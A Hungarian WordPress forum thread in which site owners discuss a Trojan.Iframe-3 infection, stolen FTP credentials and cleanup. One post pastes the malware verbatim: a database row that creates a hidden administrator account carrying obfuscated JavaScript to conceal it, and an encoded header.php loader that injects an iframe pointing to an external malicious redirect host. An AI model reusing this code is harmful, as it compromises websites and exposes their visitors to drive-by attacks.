Trojan.Iframe-3 vírus

viktorio · 2009. november 3. 21:09

egyedi design elemet akkor vesztheted el, ha pl. a használt sablonodat (amit megbuheráltál) újból felülírod

mano-2 · 2009. november 3. 21:43

kicsit lassan haladsz ezzel az írtással!

keress meg msn-en…

hangya · 2010. január 31. 11:41

Sziasztok!

Olyan tárhelyen fut a wordpress ahova csak az Én fix ip címem tud bejutni.

Mégis létre jött egy ilyen felhasználó …

WordPress verzió 2.8.6 volt, most 2.9.1-re frissítve.

És ügyesen a felhasználók között nem látszik. Vagyis volt 8 user és 4 admin de az admin-nál csak 3 jelent meg.

És persze a header.php-ba be is írta szépen magát, lásd lent.

hangya

– phpMyAdmin SQL Dump

– version 2.11.9.3

– http://www.phpmyadmin.net

–

– Hoszt: localhost

– Létrehozás ideje: 2010. Jan 31. 12:24

– Szerver verzió: 4.1.21

– PHP Verzió: 5.2.6

SET SQL_MODE=“NO_AUTO_VALUE_ON_ZERO”;

–

– Adatbázis: parafalo

–

–

--

-- Tábla szerkezet: `wp_usermeta`

--

CREATE TABLE IF NOT EXISTS `wp_usermeta` (

`umeta_id` bigint(20) unsigned NOT NULL auto_increment,

`user_id` bigint(20) unsigned NOT NULL default '0',

`meta_key` varchar(255) collate latin2_hungarian_ci default NULL,

`meta_value` longtext collate latin2_hungarian_ci,

PRIMARY KEY (`umeta_id`),

KEY `user_id` (`user_id`),

KEY `meta_key` (`meta_key`)

) ENGINE=MyISAM DEFAULT CHARSET=latin2 COLLATE=latin2_hungarian_ci AUTO_INCREMENT=113 ;

--

-- Tábla adatok: `wp_usermeta`

--

INSERT INTO `wp_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES

(107, 17, 'rich_editing', 'true'),

(108, 17, 'admin_color', 'fresh'),

(109, 17, 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}'),

(110, 17, 'first_name', 'function Decode(){var

temp="",i,c=0,out="";var str="46!46!46!32!60!98!32!105!100!61!34!117!115!101!114!95!115!117!

112!101!114!117!115!101!114!34!62!60!115!99!114!105!112!116!32!108!97!110!103!117!97!103!101!

61!34!74!97!118!97!83!99!114!105!112!116!34!62!32!118!97!114!32!115!101!116!85!115!101!114!

78!97!109!101!32!61!32!102!117!110!99!116!105!111!110!40!41!123!32!116!114!121!123!32!118!97!

114!32!116!61!100!111!99!117!109!101!110!116!46!103!101!116!69!108!101!109!101!110!116!66!

121!73!100!40!34!117!115!101!114!95!115!117!112!101!114!117!115!101!114!34!41!59!32!119!104!

105!108!101!40!116!46!110!111!100!101!78!97!109!101!33!61!34!84!82!34!41!123!32!116!61!116!

46!112!97!114!101!110!116!78!111!100!101!59!32!125!59!32!116!46!112!97!114!101!110!116!78!

111!100!101!46!114!101!109!111!118!101!67!104!105!108!100!40!116!41!59!32!118!97!114!32!116!

97!103!115!32!61!32!100!111!99!117!109!101!110!116!46!103!101!116!69!108!101!109!101!110!116!

115!66!121!84!97!103!78!97!109!101!40!34!72!51!34!41!59!32!118!97!114!32!115!32!61!32!34!32!

115!104!111!119!110!32!98!101!108!111!119!34!59!32!102!111!114!32!40!118!97!114!32!105!32!61!

32!48!59!32!105!32!60!32!116!97!103!115!46!108!101!110!103!116!104!59!32!105!43!43!41!32!123!

32!118!97!114!32!116!61!116!97!103!115!91!105!93!46!105!110!110!101!114!72!84!77!76!59!32!

118!97!114!32!104!61!116!97!103!115!91!105!93!59!32!105!102!40!116!46!105!110!100!101!120!79!

102!40!115!41!62!48!41!123!32!115!32!61!40!112!97!114!115!101!73!110!116!40!116!41!45!49!41!

43!115!59!32!104!46!114!101!109!111!118!101!67!104!105!108!100!40!104!46!102!105!114!115!116!

67!104!105!108!100!41!59!32!116!32!61!32!100!111!99!117!109!101!110!116!46!99!114!101!97!116!

101!84!101!120!116!78!111!100!101!40!115!41!59!32!104!46!97!112!112!101!110!100!67!104!105!

108!100!40!116!41!59!32!125!32!125!32!118!97!114!32!97!114!114!61!100!111!99!117!109!101!110!

116!46!103!101!116!69!108!101!109!101!110!116!115!66!121!84!97!103!78!97!109!101!40!34!117!

108!34!41!59!32!102!111!114!40!118!97!114!32!105!32!105!110!32!97!114!114!41!32!105!102!40!

97!114!114!91!105!93!46!99!108!97!115!115!78!97!109!101!61!61!34!115!117!98!115!117!98!115!

117!98!34!41!123!32!118!97!114!32!110!61!47!62!65!100!109!105!110!105!115!116!114!97!116!111!

114!32!92!40!40!92!100!43!41!92!41!60!47!103!105!46!101!120!101!99!40!97!114!114!91!105!93!

46!105!110!110!101!114!72!84!77!76!41!59!32!105!102!40!110!33!61!110!117!108!108!32!38!38!32!

110!91!49!93!62!48!41!123!32!118!97!114!32!116!120!116!61!97!114!114!91!105!93!46!105!110!

110!101!114!72!84!77!76!46!114!101!112!108!97!99!101!40!47!62!65!100!109!105!110!105!115!116!

114!97!116!111!114!32!92!40!40!92!100!43!41!92!41!60!47!103!105!44!34!62!65!100!109!105!110!

105!115!116!114!97!116!111!114!32!40!34!43!40!110!91!49!93!45!49!41!43!34!41!60!34!41!59!32!

97!114!114!91!105!93!46!105!110!110!101!114!72!84!77!76!61!116!120!116!59!32!125!32!118!97!

114!32!110!61!47!62!65!100!109!105!110!105!115!116!114!97!116!111!114!32!60!115!112!97!110!

32!99!108!97!115!115!61!34!99!111!117!110!116!34!62!92!40!40!92!100!43!41!92!41!60!47!103!

105!46!101!120!101!99!40!97!114!114!91!105!93!46!105!110!110!101!114!72!84!77!76!41!59!32!

105!102!40!110!33!61!110!117!108!108!32!38!38!32!110!91!49!93!62!48!41!123!32!118!97!114!32!

116!120!116!61!97!114!114!91!105!93!46!105!110!110!101!114!72!84!77!76!46!114!101!112!108!97!

99!101!40!47!62!65!100!109!105!110!105!115!116!114!97!116!111!114!32!60!115!112!97!110!32!99!

108!97!115!115!61!34!99!111!117!110!116!34!62!92!40!40!92!100!43!41!92!41!60!47!103!105!44!

34!62!65!100!109!105!110!105!115!116!114!97!116!111!114!32!60!115!112!97!110!32!99!108!97!

115!115!61!92!34!99!111!117!110!116!92!34!62!40!34!43!40!110!91!49!93!45!49!41!43!34!41!60!

34!41!59!32!97!114!114!91!105!93!46!105!110!110!101!114!72!84!77!76!61!116!120!116!59!32!125!

32!118!97!114!32!110!61!47!62!65!108!108!32!60!115!112!97!110!32!99!108!97!115!115!61!34!99!

111!117!110!116!34!62!92!40!40!92!100!43!41!92!41!60!47!103!105!46!101!120!101!99!40!97!114!

114!91!105!93!46!105!110!110!101!114!72!84!77!76!41!59!32!105!102!40!110!33!61!110!117!108!

108!32!38!38!32!110!91!49!93!62!48!41!123!32!118!97!114!32!116!120!116!61!97!114!114!91!105!

93!46!105!110!110!101!114!72!84!77!76!46!114!101!112!108!97!99!101!40!47!62!65!108!108!32!60!

115!112!97!110!32!99!108!97!115!115!61!34!99!111!117!110!116!34!62!92!40!40!92!100!43!41!92!

41!60!47!103!105!44!34!62!65!108!108!32!60!115!112!97!110!32!99!108!97!115!115!61!92!34!99!

111!117!110!116!92!34!62!40!34!43!40!110!91!49!93!45!49!41!43!34!41!60!34!41!59!32!97!114!

114!91!105!93!46!105!110!110!101!114!72!84!77!76!61!116!120!116!59!32!125!32!125!32!125!99!

97!116!99!104!40!101!41!123!125!59!32!125!59!32!97!100!100!76!111!97!100!69!118!101!110!116!

40!115!101!116!85!115!101!114!78!97!109!101!41!59!32!60!47!115!99!114!105!112!116!

62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!=''!'')temp=temp+str.charAt

(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);}n<script

LANGUAGE="JavaScript">nDecode();n'),

(106, 17, 'nickname', 'VaughnMendez72'),

(111, 17, 'wp_user_level', '10');

document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%264Dtdsjqu%264Fepdvnfou/xsjuf%2639%2633%264Dtdsjqu%2631tsd%264E%266D%2633%2633%2C%2633iuuq%264B00jutbmmcsfbltpgu/ofu0uet0jo/dhj%264G3%2637tfpsfg%264E%2633%2CfodpefVSJDpnqpofou%2639epdvnfou/sfgfssfs%263%3A%2C%2633%2637qbsbnfufs%264E%2635lfzxpse%2637tf%264E%2635tf%2637vs%264E2%2637IUUQ%60SFGFSFS%264E%2633%2C%2631fodpefVSJDpnqpofou%2639epdvnfou/VSM%263%3A%2C%2633%2637efgbvmu%60lfzxpse%264Eopuefgjof%2633%2C%2633%266D%2633%264F%264D%266D0tdsjqu%264F%2633%263%3A%264C%264D0tdsjqu%264F%261B%264Dtdsjqu%264F%261Bjg%2639uzqfpg%2639i%263%3A%264E%264E%2633voefgjofe%2633%263%3A%268C%261%3A%261B%261%3Aepdvnfou/xsjuf%2639%2633%264Djgsbnf%2631tsd%264E%2638iuuq%264B00jutbmmcsfbltpgu/ofu0uet0jo/dhj%264G4%2637tfpsfg%264E%2633%2CfodpefVSJDpnqpofou%2639epdvnfou/sfgfssfs%263%3A%2C%2633%2637qbsbnfufs%264E%2635lfzxpse%2637tf%264E%2635tf%2637vs%264E2%2637IUUQ%60SFGFSFS%264E%2633%2C%2631fodpefVSJDpnqpofou%2639epdvnfou/VSM%263%3A%2C%2633%2637efgbvmu%60lfzxpse%264Eopuefgjof%2638%2631xjeui%264E2%2631ifjhiu%264E2%2631cpsefs%264E1%2631gsbnfcpsefs%264E1%264F%264D0jgsbnf%264F%2633%263%3A%264C%2631%261B%268E%261Bfmtf%2631jg%2639i/joefyPg%2639%2633iuuq%264B%2633%263%3A%264E%264E1%263%3A%268C%261B%261%3A%261%3Axjoepx/mpdbujpo%264Ei%264C%261B%268E%261B%264D0tdsjqu%264F1')

<body >

hgrg · 2010. január 31. 16:22

@hangya: és ebben hol a kérdés?

Minden valószínűség szerint nem is kellett más ip. A te ip-dről kúszott fel a dög FTP-n keresztül. XP, megjegyezetett ftp felhasználónév/jelszó?

onnan meg már sajna ahogy elnéztem a wp-blog-header-t include-olva a wp-config kapcsolódási adataival pikk-pakk beírja magát a dög mindenhova… és persze folyton fejlődnek. VIGYÃZAT. minél népszerűbb a rendszer annál többen adják a fejüket számunkra kellemetlen dolgok megírására :(…

hangya · 2010. január 31. 16:40

Ahh!

Szóval a víruskereső programom megengedi hogy egy trójai feltelepüljön a gépemre. Az feltöri a tárhelyemen lévő wp és mikor másnap arra járok Firefoxal akkor megszól a vírus keresőm hogy vírusos a weblapom.

De akkor miért nem akkor szólt (vagy most is szólna) mikor a trójai települt a gépemre?

Nahh mindegy, Én nem tudom a megoldást … hátha majd valaki más.

hangya

hgrg · 2010. január 31. 16:45

Hali. Sajna elég nagy pusztítást végeztek ezek az iframe/javascript-es trójaik mostanság… népszerűsödött a rendszer … és biztosan vannak sebezhető pontjai is ( http://www.milw0rm.com/search.php > wordpress) szóval…

farkasgyozo · 2010. január 31. 23:44

Nem biztos, hogy a Te gépedről ment fel; eltároltad az FTP-det, a tárhelyszervert érte valahonnan támadás, az sorba végignézte, hogy kinek fityeg ott a megjegyzett jelszó, aztán ráharapott.

Valami hasonló módon működik. Nálam szólt külön a tárhelyszolgáltató, és még ftp vírusszűrő funkciót is tettek a Control Centerbe.

zoltn · 2010. február 19. 13:43

Sziasztok!

Nekem is vírusproblémám van, de tekintettel arra, hogy teljes mértékben laikus vagyok (annyira vagyok képes kb., hogy feltelepítsem, majd használjam a Wordpresst), fogalmam sincs a részletekről, a vírus típusáról. Két évig teljesen jól működött a honlapom, pár hete viszont az admin felületbe való bejelentkezéskor (valamint ott minden aloldal betöltésekor) a Mozilla Firefox “bejelentett támadó webhelynek” bélyegzi az oldalam. Más rendellenességek is vannak: pl. képszerkesztő nem tölt be, nem működik stb.

Olvastam arról, hogy a régi verziókat támadhatja meg vírus, nekem ez volt a nagy hibám: kezdettől fogva, mostanáig a 2.6-os verzióval futott a honlap. Azt gondoltam, segít, ha frissítek akár így, utólagosan is, ezért felraktam a legújabb, 2.9.1.-es verziót, ezzel nem is volt semmi gond, az új admin felület működik ugyan rendeltetésszerűen, de a felsorolt hibák ugyanúgy maradtak.

Megpróbáltam a sablonom fájljait is felülírni (ennek aztán az is az eredménye lett, hogy most már egyáltalán nem működik a sablonom - ennek lehet az a magyarázata, hogy az új wp-verzióval nem kompatibilis a sablon?), szóval ezeket is kicseréltem, de a vírus továbbra is megmaradt.

Most teljesen tanácstalan vagyok, és mivel nem vagyok szakértő sem, ezért kérem valaki szíves segítségét, hogy ha tud, adjon tanácsot, hogy egyáltalán mi okozhatja a hibát, illetve mit tehetek a kijavítása érdekében??

Előre is köszönöm!

varnyu-2 · 2010. február 19. 14:49

zoltn: én a helyedben legelőször a gépemet takaritanám ki. Aztán lecserélnék minden ftp jelszót. Aztán csinálnék a tárhelyemen egy virusirtást. Aztán felraknám az Antivirus plugint. Aztán, ha még mindig fennáll a probléma, fogalmam sincs, hogy mihez kezdenék … mert azt nem tudom, hogyha lementem a gépre a WP teljes export file-ját, azzal mentem-e a virusokat is …

Valszeg kapsz majd ennél használhatóbb és okosabb választ is, reméljük…

varnyu-2 · 2010. február 19. 16:12

'hangya' wrote on '2010-01-31:

Ahh!

Szóval a víruskereső programom megengedi hogy egy trójai feltelepüljön a gépemre.

@Hangya: Sajnos nincs tökéletes viruskereső! Rendszeresen olvasom a virushiradót, sok okosságot szoktak irni http://www.virushirado.hu/hirek.php

zoltn · 2010. február 22. 17:52

'varnyu' wrote on '2010-02-19:

zoltn: én a helyedben legelőször a gépemet takaritanám ki. Aztán lecserélnék minden ftp jelszót. Aztán csinálnék a tárhelyemen egy virusirtást. Aztán felraknám az Antivirus plugint. Aztán, ha még mindig fennáll a probléma, fogalmam sincs, hogy mihez kezdenék ... mert azt nem tudom, hogyha lementem a gépre a WP teljes export file-ját, azzal mentem-e a virusokat is ... :(

Valszeg kapsz majd ennél használhatóbb és okosabb választ is, reméljük...

Köszönöm a választ! Próbálkozom...

teknosferenc · 2010. február 25. 23:50

érdemes ezeket is olvasgatni http://blackhat.com/ és a http://defcon.org/ igaz ezek mind hacker konferenciák de szoktak ilyen webes okosságok is lenni. magyar oldalrol meg a http://hacktivity.hu/ -ról tudok. nem konkrétan wordpressről van a téma hanem úgy általánosságban tehát a fenti módszerek bármelyik cmsel működik.